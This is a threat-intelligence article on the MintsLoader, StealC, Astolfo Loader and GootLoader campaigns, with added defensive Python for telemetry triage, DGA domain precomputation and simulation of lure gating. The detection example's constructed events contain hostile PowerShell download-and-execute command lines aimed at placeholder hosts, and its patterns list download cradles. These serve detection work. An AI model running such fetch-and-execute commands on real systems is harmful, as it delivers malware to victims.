Security researchers have uncovered an attack campaign that uses a malware loader dubbed "MintsLoader" to deliver second-stage payloads, including the StealC information stealer and BOINC, a legitimate open-source volunteer-computing client that the attackers repurpose. The campaign has primarily targeted the energy, legal services, and oil and gas sectors in the U.S. and Europe.
MintsLoader – A PowerShell-Based Threat
According to a recent analysis by cybersecurity firm eSentire, MintsLoader is a PowerShell-based malware loader distributed through phishing emails. The emails either link to deceptive ClickFix or KongTuke pages or carry a malicious JavaScript file as an attachment.
The attacks, first detected in early January 2025, are part of a growing trend of fake CAPTCHA verification prompts. The prompt instructs the victim to run a PowerShell command themselves; because no file is downloaded through the browser, browser download warnings and attachment scanning never get a chance to fire.
Fake Verification Tactics with KongTuke
A core technique used by the attackers is KongTuke, which injects malicious scripts into fake "verify you are human" CAPTCHA pages. The victim pastes the resulting command into the Windows Run dialog and presses Enter, which starts the attack chain.
In similar campaigns analyzed by Palo Alto Networks Unit 42, the page writes the command to the victim's clipboard through the browser clipboard API and then walks them through the keystrokes (Win+R, Ctrl+V, Enter). The user supplies the execution step that a malicious attachment would otherwise have to get past a mail gateway.
The Infection Process
The infection begins when a victim clicks a phishing link that either downloads an obfuscated JavaScript file or redirects to a ClickFix-style page. The JavaScript runs a PowerShell command that fetches MintsLoader with curl and executes it, then deletes itself to remove the on-disk artifact.
Once running, MintsLoader contacts a command-and-control (C2) server and retrieves further PowerShell stages. These stages include sandbox and virtual-machine checks and a Domain Generation Algorithm (DGA) that derives the C2 domain from the current date, so the domain the loader resolves changes from day to day and a sample detonated with the wrong system date reaches out to a domain the operators never registered.
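The ClickFix-to-PowerShell chain described above leaves a recognisable shape in process-creation telemetry: a PowerShell process whose parent is explorer.exe (the Run dialog) or a script host (the JavaScript attachment), a hidden window, a download cradle, in-memory or dot-sourced execution, and often a trailing "I am not a robot" comment that the lure page appends so the pasted text looks like verification. The following is an added example, not code from the article or from eSentire; the events are constructed, the indicator weights and threshold are this example's own tuning, and the URLs are placeholders.

```python
import re

# Constructed Sysmon-style process-creation events (not real MintsLoader telemetry).
SAMPLE_EVENTS = [
    {   # ClickFix: pasted into Win+R, so explorer.exe is the parent
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": 'powershell -w hidden -c "iex (curl -useb http://example.invalid/x).Content" '
                   '# "I am not a robot - reCAPTCHA Verification ID: 8461"',
    },
    {   # JS attachment path: wscript.exe spawns PowerShell, fetches and dot-sources a script
        "parent": r"C:\Windows\System32\wscript.exe",
        "cmdline": r'powershell -ep bypass -c "curl.exe -o $env:TEMP\a.ps1 http://example.invalid/a; . $env:TEMP\a.ps1"',
    },
    {   # Benign developer usage
        "parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "cmdline": r'powershell -NoProfile -Command "Get-ChildItem C:\src"',
    },
    {   # Benign: user opened a console from the Run dialog; explorer parent alone is weak
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell",
    },
]

# Weighted indicators. Weights are illustrative tuning for this example only.
PARENT_INDICATORS = [
    ("script host parent (JS attachment)", 2, re.compile(r"\\[wc]script\.exe$", re.I)),
    ("explorer.exe parent (Run dialog or shortcut)", 1, re.compile(r"\\explorer\.exe$", re.I)),
]
CMDLINE_INDICATORS = [
    ("CAPTCHA lure comment", 3, re.compile(r"i am not a robot|recaptcha|verification id", re.I)),
    ("hidden window", 1, re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("download cradle", 1, re.compile(
        r"\b(?:curl|iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|net\.webclient|mshta)\b", re.I)),
    ("in-memory or dot-sourced execution", 1, re.compile(
        r"\biex\b|invoke-expression|(?:^|[;\s])\.\s+\S+\.ps1", re.I)),
]
THRESHOLD = 3  # a single weak signal (explorer parent, curl alone) must not page anyone


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    for name, weight, rx in PARENT_INDICATORS:
        if rx.search(event["parent"]):
            score += weight
            reasons.append(name)
    for name, weight, rx in CMDLINE_INDICATORS:
        if rx.search(event["cmdline"]):
            score += weight
            reasons.append(name)
    return score, reasons


def triage(events):
    """Score every event; an event is flagged when its weighted score reaches THRESHOLD."""
    results = []
    for ev in events:
        score, reasons = score_event(ev)
        results.append({"score": score, "reasons": reasons, "flagged": score >= THRESHOLD})
    return results


if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print("FLAG " if res["flagged"] else "ok   ", res["score"], res["reasons"], "::", ev["cmdline"][:60])
```

On an endpoint with no process telemetry, the same pasted commands survive in the user's Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting during triage of a suspected ClickFix victim.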
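A date-seeded DGA has a property that cuts both ways: the malware needs no stored domain list, but anyone who recovers the algorithm and its constants from a sample can generate the same domains for any date and register, sinkhole, or block them in advance. The block below is an added example illustrating that pattern; it is not MintsLoader's algorithm, and the seed, TLDs, label length and hash construction are this example's assumptions.

```python
import hashlib
from datetime import date, timedelta

# Hypothetical constants for illustration only; not MintsLoader's real values.
SEED = "illustrative-seed"
TLDS = ("top", "xyz")


def dga_domains(day_iso, count=4, label_len=12):
    """Candidate C2 domains for the ISO date string `day_iso` (e.g. "2025-01-06").

    Illustrative scheme: hash (seed, date, index) and map the digest to lowercase
    letters. The only property that matters is determinism: output depends solely
    on the date and the embedded seed, so a defender holding both can reproduce it.
    """
    day = date.fromisoformat(day_iso)
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{SEED}|{day.isoformat()}|{i}".encode()).hexdigest()
        # two hex chars per letter: 0..255 reduced mod 26 (slightly biased, irrelevant here)
        label = "".join(chr(ord("a") + int(digest[2 * j:2 * j + 2], 16) % 26)
                        for j in range(label_len))
        domains.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return domains


def precompute(start_iso, days):
    """Defender side: generate every domain for a window of days, mapped to the
    date it is scheduled for, so they can be blocked or sinkholed ahead of time."""
    start = date.fromisoformat(start_iso)
    table = {}
    for d in range(days):
        day = start + timedelta(days=d)
        for dom in dga_domains(day.isoformat()):
            table[dom] = day.isoformat()
    return table


def is_dga_hit(domain, start_iso, days):
    """Return the scheduled date for a queried domain inside the window, else None.
    Normalises case and a trailing dot as seen in DNS logs."""
    return precompute(start_iso, days).get(domain.lower().rstrip("."))


if __name__ == "__main__":
    for dom, day in sorted(precompute("2025-01-06", 3).items(), key=lambda kv: kv[1]):
        print(day, dom)
```

Two practical consequences follow from the date dependence. A sandbox whose clock is frozen or set to the sample's compile date produces a different domain from the one the live victim contacts, so the C2 traffic it records is not the traffic to hunt for. And a DNS-log search for the precomputed set is only as good as the window: regenerate it daily and include a day or two of slack on either side for clock skew.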
StealC: The Payload of Choice
The campaign's primary payload is StealC, an information stealer sold under a malware-as-a-service (MaaS) model since 2023 and believed to be a re-engineered version of the Arkei stealer. Like much malware sold on Russian-language forums, it refuses to run on machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan, a check that keeps the operators' home jurisdictions out of the victim set.
Astolfo Loader
The discovery of the MintsLoader campaign coincides with the emergence of Astolfo Loader, an updated version of JinxLoader. Originally written in Go, the latest version (dubbed Jinx V3) has been rewritten in C++, which its seller advertises as a performance improvement.
BlackBerry researchers revealed that the original JinxLoader author, Rendnza, sold the source code to two separate buyers, Delfin and AstolfoLoader. Delfin continues to sell the unaltered JinxLoaderV2, while AstolfoLoader has rebranded and reworked the tool as Jinx V3. The split illustrates how quickly loader source code circulates once it is sold cheaply on public hacking forums.
SEO Poisoning with GootLoader
Researchers have also spotlighted another ongoing threat: GootLoader campaigns. These use search engine optimization (SEO) poisoning so that users searching for specific documents (contract templates, legal agreements and the like) land on compromised WordPress sites.
Once the victim arrives, the site shows a realistic fake forum thread in which a "reply" offers a download of the requested document; the file is the malicious payload. The compromised WordPress sites do not host this page themselves but fetch it at request time from an external "mothership" server, usually without the site owner's knowledge.
GootLoader adds further gating on the mothership side: geofencing, IP-based restrictions, and a rule that serves the lure to a given visitor only once per day. Anyone who returns from the same address, including the site owner or an analyst repeating a fetch, is shown the benign page, which makes the infection hard to confirm and analyse.
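The gating behaviour just described is stateful, which is why a second look at a compromised site so often shows nothing. The following added model (not GootLoader's code; the country set, blocked network prefix and 24-hour window are assumptions) shows the decisions a mothership-style server would make across a sequence of visits, and therefore what an analyst has to vary (source address, geolocation, timing) to see the lure again.

```python
from datetime import datetime, timedelta

# Assumed policy for illustration; not recovered from GootLoader.
ALLOWED_COUNTRIES = {"US", "GB", "DE"}
BLOCKED_PREFIXES = ("203.0.113.",)      # e.g. known scanner ranges the operators refuse
REVISIT_WINDOW = timedelta(hours=24)


class Mothership:
    """Decides per request whether to return the fake forum page ("lure") or the
    site's normal content ("benign"). State is keyed on the visitor's IP."""

    def __init__(self):
        self.last_served = {}  # ip -> datetime the lure was last served

    def decide(self, ip, country, now_iso):
        now = datetime.fromisoformat(now_iso)
        if country not in ALLOWED_COUNTRIES:
            return "benign", "geofence"
        if ip.startswith(BLOCKED_PREFIXES):
            return "benign", "ip-blocklist"
        last = self.last_served.get(ip)
        if last is not None and now - last < REVISIT_WINDOW:
            return "benign", "revisit-within-24h"
        self.last_served[ip] = now
        return "lure", "served"


def simulate(visits):
    """Run a list of (ip, country, iso_time) visits through one server instance."""
    server = Mothership()
    return [server.decide(ip, cc, t) for ip, cc, t in visits]


# Constructed visit sequence: an analyst retrying from the same egress gets nothing.
SAMPLE_VISITS = [
    ("198.51.100.7", "US", "2025-01-06T10:00:00"),   # victim: lure served
    ("198.51.100.7", "US", "2025-01-06T10:12:00"),   # analyst re-fetch, same IP: benign
    ("198.51.100.7", "US", "2025-01-07T11:00:00"),   # >24h later: lure again
    ("192.0.2.9",    "FR", "2025-01-06T10:00:00"),   # outside geofence: benign
    ("203.0.113.4",  "US", "2025-01-06T10:00:00"),   # blocked network: benign
]

if __name__ == "__main__":
    for visit, (outcome, reason) in zip(SAMPLE_VISITS, simulate(SAMPLE_VISITS)):
        print(visit, "->", outcome, f"({reason})")
```

The practical rule this encodes: capture the full response of the first fetch, because the server is unlikely to give a second one from the same vantage point that day.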